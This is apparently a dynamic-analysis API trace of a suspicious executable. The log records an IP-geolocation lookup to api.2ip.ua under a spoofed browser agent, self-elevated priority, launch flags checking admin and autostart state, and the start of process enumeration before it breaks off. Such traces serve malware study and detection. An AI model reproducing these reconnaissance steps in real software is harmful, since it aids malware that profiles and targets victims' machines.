GetLastError () returned 0x0 [0120.434] SetLastError (dwErrCode=0x0) [0120.434] GetLastError () returned 0x0 [0120.434] SetLastError (dwErrCode=0x0) [0120.434] GetLastError () returned 0x0 [0120.434] SetLastError (dwErrCode=0x0) [0120.434] GetLastError () returned 0x0 [0120.434] SetLastError (dwErrCode=0x0) [0120.434] GetLastError () returned 0x0 [0120.435] SetLastError (dwErrCode=0x0) [0120.435] GetLastError () returned 0x0 [0120.435] SetLastError (dwErrCode=0x0) [0120.435] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641348) returned 0x3c [0120.435] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641348, Size=0x40) returned 0x641348 [0120.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0120.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3e) returned 0x635838 [0120.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x635838, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0120.435] GetLastError () returned 0x0 [0120.435] SetLastError (dwErrCode=0x0) [0120.435] GetLastError () returned 0x0 [0120.435] SetLastError (dwErrCode=0x0) [0120.435] GetLastError () returned 0x0 [0120.435] SetLastError (dwErrCode=0x0) [0120.435] GetLastError () returned 0x0 [0120.435] SetLastError (dwErrCode=0x0) [0120.435] GetLastError () returned 0x0 [0120.435] SetLastError (dwErrCode=0x0) [0120.435] GetLastError () returned 0x0 [0120.435] SetLastError (dwErrCode=0x0) [0120.435] GetLastError () returned 0x0 [0120.436] SetLastError (dwErrCode=0x0) [0120.436] GetLastError () returned 0x0 [0120.436] SetLastError (dwErrCode=0x0) [0120.436] GetLastError () returned 0x0 [0120.436] SetLastError (dwErrCode=0x0) [0120.436] GetLastError () returned 0x0 [0120.436] SetLastError (dwErrCode=0x0) [0120.436] GetLastError () returned 0x0 [0120.436] SetLastError (dwErrCode=0x0) [0120.436] GetLastError () returned 0x0 [0120.437] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641348, Size=0x44) returned 0x641408 [0120.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1b) returned 0x63efd8 [0120.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x63efd8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0120.437] GetLastError () returned 0x0 [0120.437] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x48) returned 0x641408 [0120.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0120.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1d) returned 0x63f000 [0120.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x63f000, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0120.438] GetLastError () returned 0x0 [0120.438] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x4c) returned 0x641408 [0120.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0120.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x636c28 [0120.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x636c28, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0120.438] GetLastError () returned 0x0 [0120.438] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x50) returned 0x641408 [0120.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0120.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x12) returned 0x641348 [0120.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x641348, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0120.438] GetLastError () returned 0x0 [0120.438] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x54) returned 0x641408 [0120.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0120.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x641368 [0120.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x641368, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0120.438] GetLastError () returned 0x0 [0120.438] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x58) returned 0x641408 [0120.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1b) returned 0x63f028 [0120.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x63f028, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0120.438] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x5c) returned 0x641408 [0120.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0120.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63aab0 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x63aab0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0120.439] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x60) returned 0x641408 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0120.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x29) returned 0x63b188 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x63b188, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0120.439] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x64) returned 0x641408 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0120.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1e) returned 0x63f050 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x63f050, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0120.439] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x68) returned 0x641408 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0120.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x41) returned 0x636c78 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x636c78, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0120.439] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x6c) returned 0x641408 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0120.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x17) returned 0x641480 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x641480, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0120.439] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x70) returned 0x641408 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0120.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xf) returned 0x63e720 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x63e720, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0120.439] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641408, Size=0x74) returned 0x6414a0 [0120.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0120.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x16) returned 0x641408 [0120.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x641408, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0120.440] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6414a0, Size=0x78) returned 0x6414a0 [0120.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0120.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2a) returned 0x63b1c0 [0120.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x63b1c0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0120.440] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6414a0, Size=0x7c) returned 0x6414a0 [0120.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0120.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x29) returned 0x63b1f8 [0120.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x63b1f8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0120.440] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6414a0, Size=0x80) returned 0x6414a0 [0120.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0120.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x15) returned 0x641428 [0120.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x641428, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0120.440] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6414a0, Size=0x84) returned 0x6414a0 [0120.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0120.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1e) returned 0x63f078 [0120.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x63f078, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0120.440] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6414a0, Size=0x88) returned 0x6414a0 [0120.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0120.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2a) returned 0x63b230 [0120.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x63b230, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0120.441] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6414a0, Size=0x8c) returned 0x6414a0 [0120.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0120.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x12) returned 0x641448 [0120.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x641448, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0120.441] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6414a0, Size=0x90) returned 0x6414a0 [0120.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0120.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x641538 [0120.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x641538, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0120.441] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6414a0, Size=0x94) returned 0x641558 [0120.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0120.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x46) returned 0x636cc8 [0120.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x636cc8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0120.441] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641558, Size=0x98) returned 0x641558 [0120.492] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640f18) returned 0x80 [0120.492] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640f18) returned 0x80 [0120.493] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640f18) returned 0x80 [0120.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8ec) returned 0x6415f8 [0120.539] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640f18) returned 0x80 [0120.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63e738 [0120.539] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640f18) returned 0x80 [0120.539] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640f18) returned 0x80 [0120.540] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640f18) returned 0x80 [0120.579] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640f18) returned 0x80 [0120.586] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0120.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x635b98 [0120.775] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0121.535] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18afd8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d7d8 | out: lpBuffer=0x18afd8*, lpdwNumberOfBytesRead=0x18d7d8*=0x1d0) returned 1 [0121.537] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0121.538] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0121.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x64c558 [0121.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x32421b8 [0121.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32421b8 | out: hHeap=0x620000) returned 1 [0121.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64c558 | out: hHeap=0x620000) returned 1 [0121.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b98 | out: hHeap=0x620000) returned 1 [0121.557] GetCurrentProcess () returned 0xffffffff [0121.557] GetLastError () returned 0x2 [0121.557] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0121.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6737c0 [0121.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8ec) returned 0x3228fc8 [0121.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x6741f0 [0121.577] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6741f0, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\585939.exe")) returned 0x30 [0121.577] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0121.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x32298c0 [0121.584] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" --Admin IsNotAutoStart IsNotTask" [0121.584] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18d8b8 | out: pNumArgs=0x18d8b8) returned 0x31dd3d0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" [0121.584] lstrcpyW (in: lpString1=0x18e548, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" [0121.584] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0121.584] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0121.591] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" --Admin IsNotAutoStart IsNotTask" [0121.591] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18d854 | out: pNumArgs=0x18d854) returned 0x31dd3d0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" [0121.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe") returned="585939.exe" [0121.650] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0121.650] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0121.651] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0121.651] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0121.651] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0121.653] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0121.653] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0121.653] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0121.653] EnumProcesses (in: lpidProcess=0x183050, cb=0xa000, lpcbNeeded=0x18d860 | out: lpidProcess=0x183050, lpcbNeeded=0x18d860) returned 1 [0121.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0121.661] CloseHandle (hObject=0x0) returned 0 [0121.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0121.661] CloseHandle (hObject=0x0) returned 0 [0121.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 